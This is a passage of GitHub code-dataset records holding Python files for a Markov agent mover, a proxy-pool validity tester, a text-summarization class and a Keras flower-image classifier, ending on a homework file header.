bisect(self.cdf, 
x)\n return self.outcomes[i]\n\nclass MarkovMover(AgentMover):\n \"\"\"Mapping of movement probabilities of an agent\"\"\"\n\n def __init__(self, *data):\n self.move_probs = ChainMap()\n for datum in data:\n self.add_move_probs(datum)\n\n def __repr__(self):\n return \"AgentMover()\"\n\n def add_move_probs(self, new_map):\n \"\"\"Add a new map onto the front of the chain of lookups of move probs\"\"\"\n compiled_map = {\n key: CompiledOutcomes(value)\n for key, value in new_map.items()\n }\n self.move_probs = self.move_probs.new_child(compiled_map)\n\n def next_location(self, state: Hashable):\n \"\"\"Generate a realisation of the next location an agent in the given state moves to\n \"\"\"\n movement_outcomes = self.move_probs[state]\n return movement_outcomes.weighted_choice()","repo_name":"dwu0042/mkmover","sub_path":"mkmover/markov_mover.py","file_name":"markov_mover.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26677062144","text":"# -*- coding:utf-8 -*-\n# project_xxx\\venv\\Scripts python\n\n'''\nAuthor: Felix\nEmail: xiashubai@gmail.com\nBlog: https://blog.csdn.net/u011318077\nDate: 2019/9/22 19:38\nDesc: 测试ip代理是否有效\n'''\n\nimport requests\nimport time\nfrom requests.exceptions import ProxyError, ConnectionError\nfrom MongoDB.mongo_db import MongoDB\nfrom multiprocessing.pool import ThreadPool\n\n\nclass TestIp():\n\n def test_all(self, proxy_list, method):\n # 进程池中同时最多16个进程,数据库中取出的是所有IP的一个列表\n pool = ThreadPool(16)\n # 向进程池中添加任务\n for proxy in proxy_list:\n pool.apply_async(self.test_one, args=(proxy, method))\n # 关闭进程池,不在接受新的任务\n pool.close()\n # 等待所有子进程结束\n pool.join()\n\n def test_one(self, proxy, method):\n url = 'https://www.baidu.com'\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'\n }\n proxies = {\n 'http': 'http://' + proxy['proxy'],\n 'https': 'http://' + proxy['proxy']\n }\n try:\n start_time = time.time()\n resp = requests.get(url, headers=headers, proxies=proxies, timeout=5, verify=True)\n # 记录ip代理请求用时\n delay = round(time.time() - start_time, 2)\n #\n if resp.status_code == 200:\n # 把delay加入到proxy字典中\n proxy['delay'] = delay\n if method == 'insert':\n # 插入代理到数据库\n MongoDB().insert(proxy)\n elif method == 'check':\n MongoDB().update({'proxy': proxy['proxy']}, {'delay': proxy['delay']})\n else:\n print(\"无效ip:{}\".format(proxy))\n if method == 'check':\n MongoDB().delete({'proxy': proxy['proxy']})\n except (ProxyError, ConnectionError):\n print(\"无效ip:{}\".format(proxy))\n if method == 'check':\n MongoDB().delete({'proxy': proxy['proxy']})\n except Exception:\n # traceback.print_exc()\n pass\n","repo_name":"FelixZFB/ProxiesPool","sub_path":"Crawler/test_proxy.py","file_name":"test_proxy.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40873607090","text":"#!/usr/bin/env python\r\n# ****************************************************************************\r\n# (C) Copyright 2019-2020, PwC\r\n#\r\n# @ Class for text summarization\r\n#\r\n# ****************************************************************************\r\n\r\n# ****************************************************************************\r\n# Imports\r\n# ****************************************************************************\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport 
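`CompiledOutcomes.weighted_choice` above draws in O(log n) by sampling a point in `[0, total)` and bisecting the cumulative table built in `compile`. The same idea as a standalone check; the weights and the frequency count are illustrative only:

```python
import random
from bisect import bisect
from collections import Counter

def compile_cdf(weights):
    """Build (outcomes, cdf, total) from an outcome -> weight mapping,
    the same construction as CompiledOutcomes.compile."""
    outcomes, cdf, total = [], [], 0.0
    for outcome, weight in weights.items():
        outcomes.append(outcome)
        total += weight
        cdf.append(total)
    return outcomes, cdf, total

def weighted_choice(outcomes, cdf, total):
    # random() * total lands in [0, total); bisect finds the owning bucket.
    return outcomes[bisect(cdf, random.random() * total)]

outcomes, cdf, total = compile_cdf({"home": 5, "work": 3, "shop": 2})
draws = Counter(weighted_choice(outcomes, cdf, total) for _ in range(10_000))
print(draws)  # roughly a 5:3:2 split
```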
warnings\r\nfrom PIL import Image\r\nimport pytesseract\r\nimport sys\r\nfrom pdf2image import convert_from_path\r\nimport os\r\nimport shutil\r\nfrom os.path import isfile, join\r\nfrom tqdm import tqdm\r\nfrom datetime import datetime\r\nfrom nltk.tokenize import sent_tokenize, word_tokenize\r\nimport spacy\r\nimport operator\r\nfrom sklearn.metrics.pairwise import cosine_similarity\r\nimport networkx as nx\r\nimport flask\r\nimport requests\r\nimport ast\r\nimport simplejson as json\r\nfrom nltk.corpus import stopwords\r\nfrom math import ceil\r\nimport re\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem.porter import PorterStemmer\r\nfrom nltk.stem.wordnet import WordNetLemmatizer\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\n\r\nfrom framework.summarizeData.contentSummarizationAbstract import contentSummarizationAbstract\r\nfrom framework.commonConstants import *\r\nfrom framework import commonLog\r\n\r\n\r\n# ****************************************************************************\r\n# Constants\r\n# ****************************************************************************\r\nTEMP = 'temp_'\r\nOUTDIR = 'outDir'\r\nPAGE = 'page_'\r\nDPI = 200\r\nNO_OF_THREADS = 4\r\nMAX_WORD_LENGTH = 45\r\nMAX_VALID_SENTENCE_LENGTH = 200\r\nMIN_VALID_SENTENCE_LENGTH = 6\r\nTESSERACT_PATH = 'C:/Program Files/Tesseract-OCR/tesseract.exe'\r\nspacy_nlp = spacy.load('en_core_web_md')\r\nstop_words = set(stopwords.words(\"english\"))\r\n#encoderURL = 'http://127.0.0.1:5456/encoder'\r\n# ****************************************************************************\r\n# Classes\r\n# ****************************************************************************\r\n\r\n\r\nclass contentSummarization(contentSummarizationAbstract):\r\n \"\"\"docstring for extractContentDataSummarizationClass\"\"\"\r\n\r\n def __init__(self, dataframe, encoderURL):\r\n\r\n \"\"\"\r\n dataframe: dataframe where need to store the extracted texts\r\n downloadPath: path where raw pdf files are stored\r\n pdfDir: directory inside downloadPath\r\n\r\n \"\"\"\r\n self.dataframe = dataframe\r\n self.encoderURL = encoderURL\r\n\r\n def __repr__(self):\r\n return f'{self.__class__.__name__}(dataframe, \\'{self.dataframe}\\', encoderURL, \\'{self.encoderURL}\\')'\r\n\r\n #Most frequently occuring n-grams\r\n def getTopNNgramWords(self, corpus, ngram, n=10):\r\n vec1 = CountVectorizer(ngram_range=(ngram,ngram), max_features=2000).fit(corpus)\r\n bag_of_words = vec1.transform(corpus)\r\n sum_words = bag_of_words.sum(axis=0)\r\n words_freq = [(word, sum_words[0, idx]) for word, idx in vec1.vocabulary_.items()]\r\n words_freq =sorted(words_freq, key = lambda x: x[1], reverse=True)\r\n return words_freq[:n]\r\n\r\n def getKeywords(self, rowName, newRowName, noOfWords=20):\r\n corpus = []\r\n for i in range(0, len(self.dataframe.loc[:, rowName])):\r\n if not pd.isnull(self.dataframe.loc[i, 'Full Content']):\r\n #Remove punctuations\r\n text = re.sub('[^a-zA-Z]', ' ', self.dataframe.loc[i, FULL_CONTENT])\r\n #Convert to lowercase\r\n text = text.lower()\r\n #remove tags\r\n text=re.sub(\"</?.*?>\",\" <> \", text)\r\n # remove special characters and digits\r\n text=re.sub(\"(\\\\d|\\\\W)+\",\" \", text)\r\n ##Convert to list from string\r\n text = text.split()\r\n ##Stemming\r\n ps=PorterStemmer()\r\n #Lemmatisation\r\n lem = WordNetLemmatizer()\r\n text = [lem.lemmatize(word) for word in text if not word in stop_words]\r\n text = [\" \".join(text)]\r\n top1_words = self.getTopNNgramWords(corpus=text, ngram=1, 
n=noOfWords)\r\n top2_words = self.getTopNNgramWords(corpus=text, ngram=2, n=noOfWords)\r\n top3_words = self.getTopNNgramWords(corpus=text, ngram=3, n=noOfWords)\r\n top4_words = self.getTopNNgramWords(corpus=text, ngram=4, n=noOfWords)\r\n if type(self.dataframe.loc[i, KEYWORDS]) == list:\r\n all_keywords = (list(word[0] for word in top1_words) +\r\n list(word[0] for word in top2_words) +\r\n list(word[0] for word in top3_words) +\r\n list(word[0] for word in top4_words) +\r\n self.dataframe.loc[i, KEYWORDS])\r\n corpus.append(list(set([i for i in all_keywords if not any(set(i) < set(j) for j in all_keywords)])))\r\n else:\r\n all_keywords = (list(word[0] for word in top1_words) +\r\n list(word[0] for word in top2_words) +\r\n list(word[0] for word in top3_words) +\r\n list(word[0] for word in top4_words))\r\n corpus.append(list(set([i for i in all_keywords if not any(set(i) < set(j) for j in all_keywords)])))\r\n else:\r\n corpus.append(np.nan)\r\n self.dataframe[newRowName] = corpus\r\n return self.dataframe\r\n\r\n def generatingKeywords(self):\r\n self.dataframe = self.getKeywords(rowName=FULL_CONTENT, newRowName=KEYWORDS, noOfWords=20)\r\n return self.dataframe\r\n\r\n def sentToVect(self, sentToEncode):\r\n \"\"\" 512D sentence encoding using Universal Sentende Encoder \"\"\"\r\n data = {'sentToEncode': sentToEncode}\r\n headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}\r\n r = requests.post(url=self.encoderURL, params=data, headers=headers)\r\n if r.status_code == 200:\r\n output = np.asarray(ast.literal_eval(r.text)) # ast.literal_eval(r.text)\r\n else:\r\n output = np.asarray(-1)\r\n return output\r\n\r\n def writingSummaryIntoDataframe1(self, numberOfSentences=10):\r\n \"\"\"\r\n Text Summarization: Sentence Scoring based on Word Frequency\r\n \"\"\"\r\n for idx, fullContent in tqdm(self.dataframe.loc[self.dataframe[MIMETYPE] == APPLICATION_PDF][FULL_CONTENT].iteritems(),\r\n desc=\"Generating Summary1\"):\r\n if not pd.isnull(fullContent) and len(fullContent) > 0:\r\n if len(fullContent) > 0:# and idx not in [0,2]:\r\n #commonLog.log(f'======>>>>>> {idx}-->{len(fullContent)}')\r\n validSentences = sent_tokenize(fullContent)\r\n freq_table = self.createFreqTable(\" \".join(validSentences))\r\n sentence_scores = self.scoreSentences(validSentences, freq_table)\r\n threshold = self.findAverageScore(sentence_scores)\r\n summary1 = self.generateSummaryBasedOnSentenceScore(sentence_scores, 1.0 * threshold, numberOfSentences)\r\n self.dataframe.iloc[idx, self.dataframe.columns.get_loc(CONTENT_SUMMARY_1)] = summary1\r\n return self.dataframe\r\n\r\n def writingSummaryIntoDataframe2(self, numOfSentences=10, subsetSize = 500):\r\n \"\"\" Text Summarization: TextRank using Universal Sentence Encoder \"\"\"\r\n for idx, fullContent in tqdm(self.dataframe.loc[self.dataframe[MIMETYPE] == APPLICATION_PDF][FULL_CONTENT].iteritems(),\r\n desc=\"Generating Summary2\"):\r\n if not pd.isnull(fullContent) and len(fullContent) > 0:\r\n if len(fullContent) > numOfSentences:\r\n validSentences = sent_tokenize(fullContent)\r\n summary2 = []\r\n for i in range(ceil(len(validSentences)/subsetSize)):\r\n messageEmbeddings = self.sentToVect(validSentences[i*subsetSize:(i+1)*subsetSize])\r\n # generate cosine similarity matrix\r\n sim_matrix = cosine_similarity(messageEmbeddings)\r\n # create graph and generate scores from pagerank algorithms\r\n nx_graph = nx.from_numpy_array(sim_matrix)\r\n scores = nx.pagerank(nx_graph)\r\n ranked_sentences = sorted(((scores[j], s) for j, s in 
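`getTopNNgramWords` above ranks n-grams by summing each vocabulary column of a `CountVectorizer` bag-of-words matrix. The pattern reduced to a toy corpus (sentences invented; tie order among count-1 bigrams is arbitrary):

```python
from sklearn.feature_extraction.text import CountVectorizer

def top_ngrams(corpus, ngram, n=5):
    vec = CountVectorizer(ngram_range=(ngram, ngram)).fit(corpus)
    bag = vec.transform(corpus)
    sums = bag.sum(axis=0)  # total count per vocabulary entry
    freqs = [(word, sums[0, idx]) for word, idx in vec.vocabulary_.items()]
    return sorted(freqs, key=lambda x: x[1], reverse=True)[:n]

docs = ["data pipelines move data", "data pipelines fail loudly"]
print(top_ngrams(docs, ngram=2, n=3))
# [('data pipelines', 2), ...] - the shared bigram tops the list
```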
enumerate(validSentences[i*subsetSize:(i+1)*subsetSize])), reverse=True)\r\n summary2.append(\" \".join([i[1] for i in ranked_sentences[:numOfSentences]]))\r\n self.dataframe.iloc[idx, self.dataframe.columns.get_loc(CONTENT_SUMMARY_2)] = \" \".join(i for i in summary2)\r\n else:\r\n self.dataframe.iloc[idx, self.dataframe.columns.get_loc(CONTENT_SUMMARY_2)] = ''\r\n return self.dataframe\r\n\r\n def writingSummaryIntoDataframe3(self, numOfSentences=10):\r\n pass\r\n\r\n\r\n @staticmethod\r\n def createFreqTable(sentences):\r\n \"\"\"\r\n Finding frequency of words appeared in a text corpus\r\n \"\"\"\r\n stopwords_list = set(stopwords.words('english'))\r\n words = word_tokenize(sentences)\r\n freqTable = {}\r\n for word in words:\r\n # lemmatize word\r\n for token in spacy_nlp(word):\r\n word = token.lemma_\r\n # remove stopwords\r\n if word in stopwords_list:\r\n continue\r\n elif word in freqTable:\r\n freqTable[word] += 1\r\n else:\r\n freqTable[word] = 1\r\n key_to_remove = []\r\n for key in freqTable.keys():\r\n if len(key) == 1:\r\n key_to_remove.append(key)\r\n for key in key_to_remove:\r\n freqTable.pop(key, None)\r\n return freqTable\r\n\r\n @staticmethod\r\n def scoreSentences(sentences, freqTable):\r\n \"\"\"\r\n Calculating Ranking of the sentences from a text corpus:\r\n sentences having more frequent words will get high score\r\n \"\"\"\r\n sentenceValue = {}\r\n for sentence in sentences:\r\n sentence = re.sub(r'\\d+?', '', sentence)\r\n tempSent = ''\r\n for token in spacy_nlp(sentence):\r\n word = token.lemma_\r\n tempSent = tempSent + ' ' + word\r\n sentence = tempSent\r\n word_count_in_sentence = len(word_tokenize(sentence))\r\n for wordValue in freqTable:\r\n if wordValue.lower() in sentence.lower():\r\n if sentence in sentenceValue:\r\n sentenceValue[sentence] += freqTable[wordValue]\r\n else:\r\n sentenceValue[sentence] = freqTable[wordValue]\r\n #commonLog.log(sentence)\r\n try:\r\n #commonLog.log(f'------->>>>>{sentence}------>>>')\r\n sentenceValue[sentence] = sentenceValue[sentence] // word_count_in_sentence\r\n except KeyError:\r\n pass\r\n return sentenceValue\r\n\r\n @staticmethod\r\n def findAverageScore(sentenceValue):\r\n \"\"\" Finding average score of a sentence from a text corpus \"\"\"\r\n sumValues = 0\r\n for entry in sentenceValue:\r\n sumValues += sentenceValue[entry]\r\n average = int(sumValues/len(sentenceValue))\r\n return average\r\n\r\n @staticmethod\r\n def generateSummaryBasedOnSentenceScore(sentenceValue, threshold, numberOfSentences=10):\r\n \"\"\" Generating Summary with the sentences which are having above average sentence score \"\"\"\r\n list1 = sorted(sentenceValue.items(), key=operator.itemgetter(1), reverse=True)\r\n sentences = []\r\n for sent in list1:\r\n sentences.append(sent[0])\r\n sentence_count = 0\r\n summary = ''\r\n for sentence in sentences:\r\n tempSent = ''\r\n if sentence in sentenceValue and sentenceValue[sentence] > threshold and numberOfSentences > 0:\r\n numberOfSentences = numberOfSentences - 1\r\n summary += \" \" + sentence\r\n sentence_count += 1\r\n return summary\r\n","repo_name":"swapnanilsharma/ABLE-Batch-Process-for-Creating-Embedding-File","sub_path":"framework/summarizeData/contentSummarization.py","file_name":"contentSummarization.py","file_ext":"py","file_size_in_byte":12386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6218146102","text":"#pylint: disable=C0111,E1101\nimport os\nimport itertools\n\nimport cv2\nimport numpy as np\nimport 
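The TextRank step in `writingSummaryIntoDataframe2` above builds a cosine-similarity graph over sentence embeddings and ranks sentences with PageRank. A minimal offline version of that ranking step, where TF-IDF vectors stand in for the Universal Sentence Encoder the class normally calls over HTTP (any sentence vectors would do):

```python
import networkx as nx
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity

sentences = [
    "The reactor vents excess heat through the north stack.",
    "Excess heat is vented through the north stack by the reactor.",
    "Unrelatedly, the cafeteria now serves soup on Fridays.",
]
vectors = TfidfVectorizer().fit_transform(sentences)  # stand-in embeddings
sim_matrix = cosine_similarity(vectors)   # (n, n) pairwise similarity
graph = nx.from_numpy_array(sim_matrix)   # weighted graph, one node per sentence
scores = nx.pagerank(graph)               # centrality score per sentence
ranked = sorted(((scores[i], s) for i, s in enumerate(sentences)), reverse=True)
print(ranked[0][1])  # one of the two mutually similar sentences wins
```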
tensorflow as tf\n\nfrom itertools import cycle\n\nimport matplotlib.pyplot as plt\n\nfrom keras.backend.tensorflow_backend import set_session\nfrom keras.callbacks import Callback\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom keras.layers.core import Dense, Dropout, Flatten\nfrom keras.models import Sequential, Model\nfrom keras.preprocessing.image import ImageDataGenerator, img_to_array\n\nfrom sklearn.metrics import f1_score, precision_score, recall_score, confusion_matrix, roc_curve, auc\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelBinarizer\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.6 #0.4 seems to work\nset_session(tf.Session(config=config))\n\nIMG_SIZE = 32\n\n# pylint: disable=\nclass MyMetrics(Callback):\n '''\n calculate some metrics during training\n taken from https://medium.com/@thongonary/how-to-compute-f1-score-for-each-epoch-in-keras-a1acd17715a2\n '''\n def __init__(self, tX=None, tY=None):\n super().__init__()\n\n self.val_f1s = []\n self.val_recalls = []\n self.val_precisions = []\n\n # https://github.com/keras-team/keras/issues/10472\n self.validation_data = (tX, tY)\n\n def on_epoch_end(self, epoch, logs=None):\n\n val_predict = (np.asarray(self.model.predict(self.validation_data[0]))).round()\n val_targ = self.validation_data[1]\n\n # https://stackoverflow.com/questions/45890328/sklearn-metrics-for-multiclass-classification\n _val_f1 = f1_score(val_targ, val_predict, average='micro')\n _val_recall = recall_score(val_targ, val_predict, average='micro')\n _val_precision = precision_score(val_targ, val_predict, average='micro')\n\n self.val_f1s.append(_val_f1)\n self.val_recalls.append(_val_recall)\n self.val_precisions.append(_val_precision)\n\n print(\" - val_f1: {:.4f} - val_precision: {:.4f} - val_recall: {:.4f}\".format(_val_f1, _val_precision, _val_recall))\n return\n\n\ndef create_model(input_shape=(32, 32, 3), n_classes=5, show=False):\n '''\n create the cNN model\n '''\n\n model = Sequential()\n model.add(Conv2D(32, (3, 3), padding='same', activation='relu', input_shape=input_shape))\n model.add(Conv2D(32, (3, 3), padding='same', activation='relu'))\n model.add(Conv2D(32, (3, 3), padding='same', activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Conv2D(32, (3, 3), padding='same', activation='relu'))\n model.add(Conv2D(32, (3, 3), padding='same', activation='relu'))\n model.add(Conv2D(32, (3, 3), padding='same', activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Dropout(0.2))\n\n model.add(Conv2D(16, (3, 3), padding='same', activation='relu'))\n model.add(Conv2D(16, (3, 3), padding='same', activation='relu'))\n model.add(Conv2D(16, (3, 3), padding='same', activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Conv2D(16, (3, 3), padding='same', activation='relu'))\n model.add(Conv2D(16, (3, 3), padding='same', activation='relu'))\n model.add(Conv2D(16, (3, 3), padding='same', activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n \n model.add(Dropout(0.2))\n\n model.add(Flatten())\n model.add(Dense(256, activation='relu'))\n model.add(Dense(256, activation='relu'))\n model.add(Dense(128, activation='relu'))\n model.add(Dense(128, activation='relu'))\n model.add(Dropout(0.2))\n\n model.add(Dense(n_classes, activation='softmax'))\n\n if show:\n model.summary()\n\n return model\n\n\ndef load_data(img_dir):\n '''\n loads and prepares the dataset\n '''\n tdata = []\n 
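The `MyMetrics` callback above rounds the model's validation predictions and scores them with `average='micro'`. Those three sklearn calls in isolation, on hand-made one-hot data (shapes are illustrative; all three come out to 0.75 here):

```python
import numpy as np
from sklearn.metrics import f1_score, precision_score, recall_score

y_true = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1], [1, 0, 0]])
y_prob = np.array([[0.9, 0.1, 0.0], [0.2, 0.7, 0.1],
                   [0.1, 0.2, 0.7], [0.3, 0.6, 0.1]])
y_pred = y_prob.round()  # same thresholding the callback applies

print(f1_score(y_true, y_pred, average="micro"))         # 0.75
print(precision_score(y_true, y_pred, average="micro"))  # 0.75
print(recall_score(y_true, y_pred, average="micro"))     # 0.75
```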
tlabels = []\n\n # traverse main dir\n for root, _, filenames in os.walk(img_dir):\n print(\"[INFO] Processing {:s}...\".format(root))\n for filename in filenames:\n # get full path to image\n img_file = os.path.join(root, filename)\n\n # prepare image\n image = cv2.imread(img_file)\n rimage = cv2.resize(image, (IMG_SIZE, IMG_SIZE), interpolation=cv2.INTER_AREA)\n rimage = img_to_array(rimage)\n tdata.append(rimage)\n\n # prepare corresponding label\n label = img_file.split(os.path.sep)[-2]\n tlabels.append(label)\n\n\n # [0-255] -> [0-1]\n tdata = np.array(tdata, dtype=\"float\") / 255.0\n tlabels = np.array(tlabels)\n\n # binarize the labels\n label_bin = LabelBinarizer()\n tlabels = label_bin.fit_transform(tlabels)\n\n np.save(\"flowers_data.npy\", tdata)\n np.save(\"flowers_labels.npy\", tlabels)\n return tdata, tlabels\n\n\ndef prepare_data(main_img_dir):\n '''\n populates data and labels \n '''\n\n if os.path.exists(\"flowers_data.npy\") and os.path.exists(\"flowers_labels.npy\"):\n\n # load numpy files (faster than always loading and resizing all images)\n print(\"[INFO] Loading dataset from numpy files...\")\n data = np.load(\"flowers_data.npy\")\n labels = np.load(\"flowers_labels.npy\")\n else:\n # load the data from specified folder\n print(\"[INFO] Loading dataset...\")\n data, labels = load_data(main_img_dir)\n\n return train_test_split(data, labels, test_size=0.2), os.listdir(main_img_dir)\n\n\ndef plot_confusion_matrix(cm, classes, normalize=False, title='ConfMatrix', cmap=plt.cm.Blues):\n \"\"\"\n prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n taken from http://scikit-learn.org/stable/auto_examples/model_selection/plot_confusion_matrix.html#sphx-glr-auto-examples-model-selection-plot-confusion-matrix-py\n \"\"\"\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.savefig(\"./images/\" + title + \".pdf\")\n\n\ndef calc_rocs(y_test, y_pred, class_names):\n '''\n calculates the roc curves and auc values for all\n taken from http://scikit-learn.org/stable/auto_examples/model_selection/plot_roc.html#sphx-glr-auto-examples-model-selection-plot-roc-py\n '''\n ###################################################################################\n\n # Compute ROC curve and ROC area for each class\n fpr = dict()\n tpr = dict()\n roc_auc = dict()\n\n n_classes = len(class_names)\n\n for i in range(n_classes):\n fpr[i], tpr[i], _ = roc_curve(y_test[:, i], y_pred[:, i])\n roc_auc[i] = auc(fpr[i], tpr[i])\n\n # Compute micro-average ROC curve and ROC area\n fpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y_test.ravel(), y_pred.ravel())\n roc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\n\n # First aggregate all false positive rates\n all_fpr = np.unique(np.concatenate([fpr[i] for i in range(n_classes)]))\n\n # Then interpolate all ROC curves at this points\n mean_tpr = np.zeros_like(all_fpr)\n for i in range(n_classes):\n mean_tpr += np.interp(all_fpr, 
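`load_data` above one-hot encodes string labels with `LabelBinarizer` and caches the arrays via `np.save`. The encoding step on its own, with toy labels (note that sklearn sorts the classes, and that with exactly two classes it would emit a single column instead):

```python
import numpy as np
from sklearn.preprocessing import LabelBinarizer

labels = np.array(["rose", "tulip", "rose", "daisy"])
lb = LabelBinarizer()
onehot = lb.fit_transform(labels)
print(lb.classes_)  # ['daisy' 'rose' 'tulip'] - sorted class order
print(onehot)       # each row is one-hot in that order, e.g. rose -> [0 1 0]
```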
fpr[i], tpr[i])\n\n # Finally average it and compute AUC\n mean_tpr /= n_classes\n\n # Compute macro-average ROC curve and ROC area\n fpr[\"macro\"] = all_fpr\n tpr[\"macro\"] = mean_tpr\n roc_auc[\"macro\"] = auc(fpr[\"macro\"], tpr[\"macro\"])\n\n # Plot all ROC curves\n plt.figure()\n plt.plot(fpr[\"micro\"], tpr[\"micro\"], label='micro-average ROC curve (area = {0:0.2f})'.format(roc_auc[\"micro\"]), color='red', linestyle=':', linewidth=4)\n plt.plot(fpr[\"macro\"], tpr[\"macro\"], label='macro-average ROC curve (area = {0:0.2f})'.format(roc_auc[\"macro\"]), color='blue', linestyle=':', linewidth=4)\n\n plt.plot([0, 1], [0, 1], 'k--', lw=2)\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('ROC-AUC (micro and macro average)')\n plt.legend(loc=\"lower right\")\n plt.savefig(\"./images/ROC-AUC(micro and macro average).pdf\")\n #plt.show()\n\n colors = ['aqua', 'darkorange', 'green', 'red', 'yellow']\n\n plt.figure()\n for i, color in zip(range(n_classes), colors):\n plt.plot(fpr[i], tpr[i], color=color, lw=2, label='ROC curve for {0:s} (area = {1:0.2f})'.format(class_names[i], roc_auc[i]))\n\n plt.plot([0, 1], [0, 1], 'k--', lw=2)\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('ROC-AUC (all classes)')\n plt.legend(loc=\"lower right\")\n plt.savefig(\"./images/ROC-AUC(all classes).pdf\")\n plt.show()\n\n ###################################################################################\n\n \ndef show_stats(his, metr):\n\n plt.plot(his.history['acc'])\n plt.plot(his.history['val_acc'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plt.savefig(\"./images/accuracy.pdf\")\n plt.show()\n\n plt.plot(his.history['loss'])\n plt.plot(his.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plt.savefig(\"./images/loss.pdf\")\n plt.show()\n\n plt.plot(metr.val_precisions)\n plt.plot(metr.val_recalls)\n plt.title('model precision/recall')\n plt.ylabel('precision/recall')\n plt.xlabel('epoch')\n plt.legend(['precision', 'recall'], loc='upper left')\n plt.savefig(\"./images/prec_rec.pdf\")\n plt.show()\n\n plt.plot(metr.val_f1s)\n plt.title('model f1 score')\n plt.ylabel('f1 score')\n plt.xlabel('epoch')\n plt.legend(['f1 score'], loc='upper left')\n plt.savefig(\"./images/f1score.pdf\")\n plt.show()\n\n\ndef start_main():\n\n # get data for train and test\n (x_train, x_test, y_train, y_test), class_names = prepare_data(\"./flowerOrig\")\n\n print(\"[INFO] Using {:d} samples for training and {:d} samples for testing\".format(x_train.shape[0], x_test.shape[0]))\n\n model1 = create_model(input_shape=x_train.shape[1:], n_classes=len(class_names), show=True)\n\n batch_size = 64 # smaller -> slower\n epochs = 100 # higher -> nearly always useless after some point around 100 or less\n\n print(\"[INFO] Compiling model...\")\n # loss -> categorical because mutlilabel, optimizer -> no big changes\n model1.compile(optimizer=\"rmsprop\", loss='categorical_crossentropy', metrics=['accuracy']) \n\n # construct the image generator for data augmentation\n aug = ImageDataGenerator(\n zca_whitening=False, # apply ZCA whitening\n rotation_range=180, # randomly rotate images in the range (degrees, 0 to 180)\n width_shift_range=0.1, # randomly shift images horizontally (fraction of total 
width)\n height_shift_range=0.1, # randomly shift images vertically (fraction of total height)\n horizontal_flip=True, # randomly flip images\n vertical_flip=True) # randomly flip images\n\n mymetrics = MyMetrics(x_test, y_test)\n\n print(\"[INFO] Training the model...\")\n history = model1.fit_generator(aug.flow(x_train, y_train, batch_size=batch_size),\n validation_data=(x_test, y_test),\n\t epochs=epochs, verbose=1, callbacks=[mymetrics])\n\n print(\"[INFO] Evaluating the model...\")\n scores = model1.evaluate(x_test, y_test, verbose=1)\n\n print(\"Accuracy: {:.4f}\".format(scores[1]))\n print(\"Precision: {:.4f}\".format(mymetrics.val_precisions[-1]))\n print(\"Recall: {:.4f}\".format(mymetrics.val_recalls[-1]))\n print(\"F1 score: {:.4f}\".format(mymetrics.val_f1s[-1]))\n\n show_stats(history, mymetrics)\n\n # confusion matrix\n y_pred = model1.predict(x_test)\n\n cnf_matrix = confusion_matrix(np.argmax(y_test, axis=1), np.argmax(y_pred, axis=1))\n\n # Plot non-normalized confusion matrix\n plt.figure()\n plot_confusion_matrix(cnf_matrix, classes=class_names,\n title='Confusion matrix without normalization')\n\n # Plot normalized confusion matrix\n plt.figure()\n plot_confusion_matrix(cnf_matrix, classes=class_names, normalize=True,\n title='Normalized confusion matrix')\n\n #plt.show()\n\n calc_rocs(y_test, y_pred, class_names)\n\n print(\"[INFO] Saving the model...\")\n model1.save(\"mymodel.dat\")\n\n print(\"[INFO] Finished!\")\n\n\nstart_main()\n","repo_name":"HeleleF/cnnProjUni","sub_path":"code/my_cnn_train.py","file_name":"my_cnn_train.py","file_ext":"py","file_size_in_byte":12865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22884753988","text":"\"\"\"\nFile: hw4_part5.py\nAuthor: Denish Pasupuleti\nDate: 9/29/19\nSection: 